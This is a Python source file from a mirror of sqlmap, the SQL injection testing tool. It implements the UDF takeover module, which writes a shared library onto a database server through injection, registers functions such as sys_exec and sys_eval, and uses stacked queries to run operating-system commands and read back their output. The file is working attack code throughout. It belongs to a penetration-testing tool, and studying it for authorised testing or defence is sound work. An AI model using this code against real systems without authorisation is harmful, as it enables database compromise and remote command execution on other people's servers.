mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-25 21:21:03 +03:00 
			
		
		
		
	
		
			
				
	
	
		
			397 lines
		
	
	
		
			14 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
			
		
		
	
	
			397 lines
		
	
	
		
			14 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
| #!/usr/bin/env python
 | |
| 
 | |
| """
 | |
| Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
 | |
| See the file 'LICENSE' for copying permission
 | |
| """
 | |
| 
 | |
| import os
 | |
| 
 | |
| from lib.core.agent import agent
 | |
| from lib.core.common import Backend
 | |
| from lib.core.common import checkFile
 | |
| from lib.core.common import dataToStdout
 | |
| from lib.core.common import isDigit
 | |
| from lib.core.common import isStackingAvailable
 | |
| from lib.core.common import readInput
 | |
| from lib.core.common import unArrayizeValue
 | |
| from lib.core.compat import xrange
 | |
| from lib.core.data import conf
 | |
| from lib.core.data import logger
 | |
| from lib.core.data import queries
 | |
| from lib.core.enums import CHARSET_TYPE
 | |
| from lib.core.enums import DBMS
 | |
| from lib.core.enums import EXPECTED
 | |
| from lib.core.enums import OS
 | |
| from lib.core.exception import SqlmapFilePathException
 | |
| from lib.core.exception import SqlmapMissingMandatoryOptionException
 | |
| from lib.core.exception import SqlmapUnsupportedFeatureException
 | |
| from lib.core.exception import SqlmapUserQuitException
 | |
| from lib.core.unescaper import unescaper
 | |
| from lib.request import inject
 | |
| 
 | |
| class UDF(object):
 | |
|     """
 | |
|     This class defines methods to deal with User-Defined Functions for
 | |
|     plugins.
 | |
|     """
 | |
| 
 | |
|     def __init__(self):
 | |
|         self.createdUdf = set()
 | |
|         self.udfs = {}
 | |
|         self.udfToCreate = set()
 | |
| 
 | |
|     def _askOverwriteUdf(self, udf):
 | |
|         message = "UDF '%s' already exists, do you " % udf
 | |
|         message += "want to overwrite it? [y/N] "
 | |
| 
 | |
|         return readInput(message, default='N', boolean=True)
 | |
| 
 | |
|     def _checkExistUdf(self, udf):
 | |
|         logger.info("checking if UDF '%s' already exist" % udf)
 | |
| 
 | |
|         query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
 | |
|         return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY)
 | |
| 
 | |
|     def udfCheckAndOverwrite(self, udf):
 | |
|         exists = self._checkExistUdf(udf)
 | |
|         overwrite = True
 | |
| 
 | |
|         if exists:
 | |
|             overwrite = self._askOverwriteUdf(udf)
 | |
| 
 | |
|         if overwrite:
 | |
|             self.udfToCreate.add(udf)
 | |
| 
 | |
|     def udfCreateSupportTbl(self, dataType):
 | |
|         debugMsg = "creating a support table for user-defined functions"
 | |
|         logger.debug(debugMsg)
 | |
| 
 | |
|         self.createSupportTbl(self.cmdTblName, self.tblField, dataType)
 | |
| 
 | |
|     def udfForgeCmd(self, cmd):
 | |
|         if not cmd.startswith("'"):
 | |
|             cmd = "'%s" % cmd
 | |
| 
 | |
|         if not cmd.endswith("'"):
 | |
|             cmd = "%s'" % cmd
 | |
| 
 | |
|         return cmd
 | |
| 
 | |
|     def udfExecCmd(self, cmd, silent=False, udfName=None):
 | |
|         if udfName is None:
 | |
|             udfName = "sys_exec"
 | |
| 
 | |
|         cmd = unescaper.escape(self.udfForgeCmd(cmd))
 | |
| 
 | |
|         return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
 | |
| 
 | |
|     def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
 | |
|         if udfName is None:
 | |
|             udfName = "sys_eval"
 | |
| 
 | |
|         if conf.direct:
 | |
|             output = self.udfExecCmd(cmd, udfName=udfName)
 | |
| 
 | |
|             if output and isinstance(output, (list, tuple)):
 | |
|                 new_output = ""
 | |
| 
 | |
|                 for line in output:
 | |
|                     new_output += line.replace("\r", "\n")
 | |
| 
 | |
|                 output = new_output
 | |
|         else:
 | |
|             cmd = unescaper.escape(self.udfForgeCmd(cmd))
 | |
| 
 | |
|             inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
 | |
|             output = unArrayizeValue(inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False))
 | |
|             inject.goStacked("DELETE FROM %s" % self.cmdTblName)
 | |
| 
 | |
|         return output
 | |
| 
 | |
|     def udfCheckNeeded(self):
 | |
|         if (not any((conf.fileRead, conf.commonFiles)) or (any((conf.fileRead, conf.commonFiles)) and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
 | |
|             self.sysUdfs.pop("sys_fileread")
 | |
| 
 | |
|         if not conf.osPwn:
 | |
|             self.sysUdfs.pop("sys_bineval")
 | |
| 
 | |
|         if not conf.osCmd and not conf.osShell and not conf.regRead:
 | |
|             self.sysUdfs.pop("sys_eval")
 | |
| 
 | |
|             if not conf.osPwn and not conf.regAdd and not conf.regDel:
 | |
|                 self.sysUdfs.pop("sys_exec")
 | |
| 
 | |
|     def udfSetRemotePath(self):
 | |
|         errMsg = "udfSetRemotePath() method must be defined within the plugin"
 | |
|         raise SqlmapUnsupportedFeatureException(errMsg)
 | |
| 
 | |
|     def udfSetLocalPaths(self):
 | |
|         errMsg = "udfSetLocalPaths() method must be defined within the plugin"
 | |
|         raise SqlmapUnsupportedFeatureException(errMsg)
 | |
| 
 | |
|     def udfCreateFromSharedLib(self, udf, inpRet):
 | |
|         errMsg = "udfCreateFromSharedLib() method must be defined within the plugin"
 | |
|         raise SqlmapUnsupportedFeatureException(errMsg)
 | |
| 
 | |
|     def udfInjectCore(self, udfDict):
 | |
|         written = False
 | |
| 
 | |
|         for udf in udfDict.keys():
 | |
|             if udf in self.createdUdf:
 | |
|                 continue
 | |
| 
 | |
|             self.udfCheckAndOverwrite(udf)
 | |
| 
 | |
|         if len(self.udfToCreate) > 0:
 | |
|             self.udfSetRemotePath()
 | |
|             checkFile(self.udfLocalFile)
 | |
|             written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
 | |
| 
 | |
|             if written is not True:
 | |
|                 errMsg = "there has been a problem uploading the shared library, "
 | |
|                 errMsg += "it looks like the binary file has not been written "
 | |
|                 errMsg += "on the database underlying file system"
 | |
|                 logger.error(errMsg)
 | |
| 
 | |
|                 message = "do you want to proceed anyway? Beware that the "
 | |
|                 message += "operating system takeover will fail [y/N] "
 | |
| 
 | |
|                 if readInput(message, default='N', boolean=True):
 | |
|                     written = True
 | |
|                 else:
 | |
|                     return False
 | |
|         else:
 | |
|             return True
 | |
| 
 | |
|         for udf, inpRet in udfDict.items():
 | |
|             if udf in self.udfToCreate and udf not in self.createdUdf:
 | |
|                 self.udfCreateFromSharedLib(udf, inpRet)
 | |
| 
 | |
|         if Backend.isDbms(DBMS.MYSQL):
 | |
|             supportTblType = "longtext"
 | |
|         elif Backend.isDbms(DBMS.PGSQL):
 | |
|             supportTblType = "text"
 | |
| 
 | |
|         self.udfCreateSupportTbl(supportTblType)
 | |
| 
 | |
|         return written
 | |
| 
 | |
|     def udfInjectSys(self):
 | |
|         self.udfSetLocalPaths()
 | |
|         self.udfCheckNeeded()
 | |
|         return self.udfInjectCore(self.sysUdfs)
 | |
| 
 | |
|     def udfInjectCustom(self):
 | |
|         if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL):
 | |
|             errMsg = "UDF injection feature only works on MySQL and PostgreSQL"
 | |
|             logger.error(errMsg)
 | |
|             return
 | |
| 
 | |
|         if not isStackingAvailable() and not conf.direct:
 | |
|             errMsg = "UDF injection feature requires stacked queries SQL injection"
 | |
|             logger.error(errMsg)
 | |
|             return
 | |
| 
 | |
|         self.checkDbmsOs()
 | |
| 
 | |
|         if not self.isDba():
 | |
|             warnMsg = "functionality requested probably does not work because "
 | |
|             warnMsg += "the current session user is not a database administrator"
 | |
|             logger.warning(warnMsg)
 | |
| 
 | |
|         if not conf.shLib:
 | |
|             msg = "what is the local path of the shared library? "
 | |
| 
 | |
|             while True:
 | |
|                 self.udfLocalFile = readInput(msg)
 | |
| 
 | |
|                 if self.udfLocalFile:
 | |
|                     break
 | |
|                 else:
 | |
|                     logger.warning("you need to specify the local path of the shared library")
 | |
|         else:
 | |
|             self.udfLocalFile = conf.shLib
 | |
| 
 | |
|         if not os.path.exists(self.udfLocalFile):
 | |
|             errMsg = "the specified shared library file does not exist"
 | |
|             raise SqlmapFilePathException(errMsg)
 | |
| 
 | |
|         if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"):
 | |
|             errMsg = "shared library file must end with '.dll' or '.so'"
 | |
|             raise SqlmapMissingMandatoryOptionException(errMsg)
 | |
| 
 | |
|         elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS):
 | |
|             errMsg = "you provided a shared object as shared library, but "
 | |
|             errMsg += "the database underlying operating system is Windows"
 | |
|             raise SqlmapMissingMandatoryOptionException(errMsg)
 | |
| 
 | |
|         elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX):
 | |
|             errMsg = "you provided a dynamic-link library as shared library, "
 | |
|             errMsg += "but the database underlying operating system is Linux"
 | |
|             raise SqlmapMissingMandatoryOptionException(errMsg)
 | |
| 
 | |
|         self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
 | |
|         self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]
 | |
| 
 | |
|         msg = "how many user-defined functions do you want to create "
 | |
|         msg += "from the shared library? "
 | |
| 
 | |
|         while True:
 | |
|             udfCount = readInput(msg, default='1')
 | |
| 
 | |
|             if udfCount.isdigit():
 | |
|                 udfCount = int(udfCount)
 | |
| 
 | |
|                 if udfCount <= 0:
 | |
|                     logger.info("nothing to inject then")
 | |
|                     return
 | |
|                 else:
 | |
|                     break
 | |
|             else:
 | |
|                 logger.warning("invalid value, only digits are allowed")
 | |
| 
 | |
|         for x in xrange(0, udfCount):
 | |
|             while True:
 | |
|                 msg = "what is the name of the UDF number %d? " % (x + 1)
 | |
|                 udfName = readInput(msg)
 | |
| 
 | |
|                 if udfName:
 | |
|                     self.udfs[udfName] = {}
 | |
|                     break
 | |
|                 else:
 | |
|                     logger.warning("you need to specify the name of the UDF")
 | |
| 
 | |
|             if Backend.isDbms(DBMS.MYSQL):
 | |
|                 defaultType = "string"
 | |
|             elif Backend.isDbms(DBMS.PGSQL):
 | |
|                 defaultType = "text"
 | |
| 
 | |
|             self.udfs[udfName]["input"] = []
 | |
| 
 | |
|             msg = "how many input parameters takes UDF "
 | |
|             msg += "'%s'? (default: 1) " % udfName
 | |
| 
 | |
|             while True:
 | |
|                 parCount = readInput(msg, default='1')
 | |
| 
 | |
|                 if parCount.isdigit() and int(parCount) >= 0:
 | |
|                     parCount = int(parCount)
 | |
|                     break
 | |
| 
 | |
|                 else:
 | |
|                     logger.warning("invalid value, only digits >= 0 are allowed")
 | |
| 
 | |
|             for y in xrange(0, parCount):
 | |
|                 msg = "what is the data-type of input parameter "
 | |
|                 msg += "number %d? (default: %s) " % ((y + 1), defaultType)
 | |
| 
 | |
|                 while True:
 | |
|                     parType = readInput(msg, default=defaultType).strip()
 | |
| 
 | |
|                     if parType.isdigit():
 | |
|                         logger.warning("you need to specify the data-type of the parameter")
 | |
| 
 | |
|                     else:
 | |
|                         self.udfs[udfName]["input"].append(parType)
 | |
|                         break
 | |
| 
 | |
|             msg = "what is the data-type of the return "
 | |
|             msg += "value? (default: %s) " % defaultType
 | |
| 
 | |
|             while True:
 | |
|                 retType = readInput(msg, default=defaultType)
 | |
| 
 | |
|                 if hasattr(retType, "isdigit") and retType.isdigit():
 | |
|                     logger.warning("you need to specify the data-type of the return value")
 | |
|                 else:
 | |
|                     self.udfs[udfName]["return"] = retType
 | |
|                     break
 | |
| 
 | |
|         success = self.udfInjectCore(self.udfs)
 | |
| 
 | |
|         if success is False:
 | |
|             self.cleanup(udfDict=self.udfs)
 | |
|             return False
 | |
| 
 | |
|         msg = "do you want to call your injected user-defined "
 | |
|         msg += "functions now? [Y/n/q] "
 | |
|         choice = readInput(msg, default='Y').upper()
 | |
| 
 | |
|         if choice == 'N':
 | |
|             self.cleanup(udfDict=self.udfs)
 | |
|             return
 | |
|         elif choice == 'Q':
 | |
|             self.cleanup(udfDict=self.udfs)
 | |
|             raise SqlmapUserQuitException
 | |
| 
 | |
|         while True:
 | |
|             udfList = []
 | |
|             msg = "which UDF do you want to call?"
 | |
| 
 | |
|             for udf in self.udfs.keys():
 | |
|                 udfList.append(udf)
 | |
|                 msg += "\n[%d] %s" % (len(udfList), udf)
 | |
| 
 | |
|             msg += "\n[q] Quit"
 | |
| 
 | |
|             while True:
 | |
|                 choice = readInput(msg).upper()
 | |
| 
 | |
|                 if choice == 'Q':
 | |
|                     break
 | |
|                 elif isDigit(choice) and int(choice) > 0 and int(choice) <= len(udfList):
 | |
|                     choice = int(choice)
 | |
|                     break
 | |
|                 else:
 | |
|                     warnMsg = "invalid value, only digits >= 1 and "
 | |
|                     warnMsg += "<= %d are allowed" % len(udfList)
 | |
|                     logger.warning(warnMsg)
 | |
| 
 | |
|             if not isinstance(choice, int):
 | |
|                 break
 | |
| 
 | |
|             cmd = ""
 | |
|             count = 1
 | |
|             udfToCall = udfList[choice - 1]
 | |
| 
 | |
|             for inp in self.udfs[udfToCall]["input"]:
 | |
|                 msg = "what is the value of the parameter number "
 | |
|                 msg += "%d (data-type: %s)? " % (count, inp)
 | |
| 
 | |
|                 while True:
 | |
|                     parValue = readInput(msg)
 | |
| 
 | |
|                     if parValue:
 | |
|                         if "int" not in inp and "bool" not in inp:
 | |
|                             parValue = "'%s'" % parValue
 | |
| 
 | |
|                         cmd += "%s," % parValue
 | |
| 
 | |
|                         break
 | |
|                     else:
 | |
|                         logger.warning("you need to specify the value of the parameter")
 | |
| 
 | |
|                 count += 1
 | |
| 
 | |
|             cmd = cmd[:-1]
 | |
|             msg = "do you want to retrieve the return value of the "
 | |
|             msg += "UDF? [Y/n] "
 | |
| 
 | |
|             if readInput(msg, default='Y', boolean=True):
 | |
|                 output = self.udfEvalCmd(cmd, udfName=udfToCall)
 | |
| 
 | |
|                 if output:
 | |
|                     conf.dumper.string("return value", output)
 | |
|                 else:
 | |
|                     dataToStdout("No return value\n")
 | |
|             else:
 | |
|                 self.udfExecCmd(cmd, udfName=udfToCall, silent=True)
 | |
| 
 | |
|             msg = "do you want to call this or another injected UDF? [Y/n] "
 | |
| 
 | |
|             if not readInput(msg, default='Y', boolean=True):
 | |
|                 break
 | |
| 
 | |
|         self.cleanup(udfDict=self.udfs)
 |